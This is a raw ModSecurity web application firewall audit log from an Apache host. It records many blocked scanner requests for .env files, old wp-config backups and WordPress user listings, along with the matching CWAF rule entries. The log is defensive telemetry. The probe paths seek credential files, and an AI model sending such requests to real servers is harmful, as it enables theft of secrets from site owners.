Gecko) Ubuntu Chromium/67.0.3396.99 Chrome/67.0.3396.99 Safari/537.36 Accept-Charset: utf-8 --a45fe228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a45fe228-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745182666275282 888 (- - -) Stopwatch2: 1745182666275282 888; combined=381, p1=346, p2=0, p3=0, p4=0, p5=35, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a45fe228-Z-- --da04a15b-A-- [21/Apr/2025:04:28:27 +0700] aAVm-3fk8_rbvOkGr1q8-AAAAJA 103.236.140.4 55000 103.236.140.4 8181 --da04a15b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --da04a15b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da04a15b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745184507837793 821 (- - -) Stopwatch2: 1745184507837793 821; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da04a15b-Z-- --6d893b26-A-- [21/Apr/2025:05:04:46 +0700] aAVvfpjcgo97ICfbW9PhTAAAABM 103.236.140.4 35442 103.236.140.4 8181 --6d893b26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.42.129.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.42.129.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6d893b26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d893b26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745186686287126 3595 (- - -) Stopwatch2: 1745186686287126 3595; combined=1527, p1=505, p2=991, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d893b26-Z-- --58c49441-A-- [21/Apr/2025:05:52:12 +0700] aAV6nHgNnYly62OFre4zXAAAAE0 103.236.140.4 46822 103.236.140.4 8181 --58c49441-B-- GET /wp-config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 82.165.85.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.85.33 X-Forwarded-Proto: http Connection: close Accept: */* --58c49441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58c49441-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745189532709965 812 (- - -) Stopwatch2: 1745189532709965 812; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58c49441-Z-- --8001206f-A-- [21/Apr/2025:06:20:07 +0700] aAWBJ5jcgo97ICfbW9PnBQAAAAk 103.236.140.4 53216 103.236.140.4 8181 --8001206f-B-- GET /wp-config.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 74.208.58.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.208.58.4 X-Forwarded-Proto: http Connection: close Accept: */* --8001206f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8001206f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745191207452359 804 (- - -) Stopwatch2: 1745191207452359 804; combined=304, p1=263, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8001206f-Z-- --7932a545-A-- [21/Apr/2025:07:25:58 +0700] aAWQlngNnYly62OFre44VAAAAE8 103.236.140.4 40568 103.236.140.4 8181 --7932a545-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0 Accept-Charset: utf-8 --7932a545-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7932a545-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745195158358228 813 (- - -) Stopwatch2: 1745195158358228 813; combined=364, p1=324, p2=0, p3=0, p4=0, p5=39, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7932a545-Z-- --5ebcca0e-A-- [21/Apr/2025:07:32:13 +0700] aAWSDZjcgo97ICfbW9PszwAAAAM 103.236.140.4 42032 103.236.140.4 8181 --5ebcca0e-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 134.209.25.199 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 134.209.25.199 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5ebcca0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ebcca0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745195533902190 794 (- - -) Stopwatch2: 1745195533902190 794; combined=292, p1=257, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ebcca0e-Z-- --6b0edf2d-A-- [21/Apr/2025:07:45:35 +0700] aAWVL3fk8_rbvOkGr1rHJQAAAIQ 103.236.140.4 45118 103.236.140.4 8181 --6b0edf2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99 Accept-Charset: utf-8 --6b0edf2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b0edf2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745196335351012 836 (- - -) Stopwatch2: 1745196335351012 836; combined=379, p1=338, p2=0, p3=0, p4=0, p5=41, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b0edf2d-Z-- --0176fd70-A-- [21/Apr/2025:07:51:54 +0700] aAWWqngNnYly62OFre45wgAAAEg 103.236.140.4 46616 103.236.140.4 8181 --0176fd70-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) Accept-Charset: utf-8 --0176fd70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0176fd70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745196714104936 891 (- - -) Stopwatch2: 1745196714104936 891; combined=418, p1=377, p2=0, p3=0, p4=0, p5=41, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0176fd70-Z-- --9f3ffe75-A-- [21/Apr/2025:08:27:39 +0700] aAWfC3gNnYly62OFre47pQAAAE8 103.236.140.4 54890 103.236.140.4 8181 --9f3ffe75-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.49.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.49.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9f3ffe75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f3ffe75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745198859059858 763 (- - -) Stopwatch2: 1745198859059858 763; combined=323, p1=288, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f3ffe75-Z-- --38d5dc31-A-- [21/Apr/2025:09:05:15 +0700] aAWn25jcgo97ICfbW9PyhgAAABQ 103.236.140.4 35588 103.236.140.4 8181 --38d5dc31-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.189.95.232 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.189.95.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --38d5dc31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38d5dc31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745201115804904 755 (- - -) Stopwatch2: 1745201115804904 755; combined=278, p1=246, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38d5dc31-Z-- --8207894d-A-- [21/Apr/2025:09:05:18 +0700] aAWn3pjcgo97ICfbW9PyiQAAAAA 103.236.140.4 35620 103.236.140.4 8181 --8207894d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 138.197.191.87 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 138.197.191.87 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8207894d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8207894d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745201118584987 759 (- - -) Stopwatch2: 1745201118584987 759; combined=312, p1=274, p2=0, p3=0, p4=0, p5=37, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8207894d-Z-- --e9240911-A-- [21/Apr/2025:10:35:25 +0700] aAW8_XgNnYly62OFre5DEQAAAEA 103.236.140.4 57640 103.236.140.4 8181 --e9240911-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 XWEB/882 MMWEBSDK/190506 Mobile Safari/537.36 MMWEBID/409 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --e9240911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9240911-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745206525056252 777 (- - -) Stopwatch2: 1745206525056252 777; combined=311, p1=263, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9240911-Z-- --199e873e-A-- [21/Apr/2025:13:15:04 +0700] aAXiaHfk8_rbvOkGr1raFwAAAJU 103.236.140.4 39030 103.236.140.4 8181 --199e873e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 Accept-Charset: utf-8 --199e873e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --199e873e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745216104976538 781 (- - -) Stopwatch2: 1745216104976538 781; combined=344, p1=308, p2=0, p3=0, p4=0, p5=36, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --199e873e-Z-- --a50b3c29-A-- [21/Apr/2025:14:22:43 +0700] aAXyQ3fk8_rbvOkGr1rd6gAAAIQ 103.236.140.4 55182 103.236.140.4 8181 --a50b3c29-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; MI 5 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/3072 MicroMessenger/7.0.3.1400(0x2700033C) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --a50b3c29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a50b3c29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745220163555971 845 (- - -) Stopwatch2: 1745220163555971 845; combined=355, p1=308, p2=0, p3=0, p4=0, p5=46, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a50b3c29-Z-- --8c4cd10c-A-- [21/Apr/2025:15:50:40 +0700] aAYG4HgNnYly62OFre5V2AAAAEA 103.236.140.4 48284 103.236.140.4 8181 --8c4cd10c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.133.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.133.65 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8c4cd10c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c4cd10c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745225440572637 874 (- - -) Stopwatch2: 1745225440572637 874; combined=351, p1=302, p2=0, p3=0, p4=0, p5=49, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c4cd10c-Z-- --571d3170-A-- [21/Apr/2025:16:08:26 +0700] aAYLCnfk8_rbvOkGr1rkLwAAAIU 103.236.140.4 52566 103.236.140.4 8181 --571d3170-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Accept-Charset: utf-8 --571d3170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --571d3170-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745226506102248 854 (- - -) Stopwatch2: 1745226506102248 854; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --571d3170-Z-- --ce8adf67-A-- [21/Apr/2025:20:29:32 +0700] aAZIPHgNnYly62OFre6sfgAAAFI 103.236.140.4 34042 103.236.140.4 8181 --ce8adf67-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ce8adf67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce8adf67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172154290 833 (- - -) Stopwatch2: 1745242172154290 833; combined=358, p1=318, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce8adf67-Z-- --de20f70a-A-- [21/Apr/2025:20:29:32 +0700] aAZIPJjcgo97ICfbW9NzDAAAABM 103.236.140.4 34056 103.236.140.4 8181 --de20f70a-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --de20f70a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de20f70a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172349625 804 (- - -) Stopwatch2: 1745242172349625 804; combined=373, p1=320, p2=0, p3=0, p4=0, p5=52, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de20f70a-Z-- --00d10509-A-- [21/Apr/2025:20:29:32 +0700] aAZIPHgNnYly62OFre6sgAAAAEs 103.236.140.4 34070 103.236.140.4 8181 --00d10509-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --00d10509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00d10509-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172518965 782 (- - -) Stopwatch2: 1745242172518965 782; combined=338, p1=299, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00d10509-Z-- --c0e2a625-A-- [21/Apr/2025:20:29:32 +0700] aAZIPJjcgo97ICfbW9NzDwAAABQ 103.236.140.4 34080 103.236.140.4 8181 --c0e2a625-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 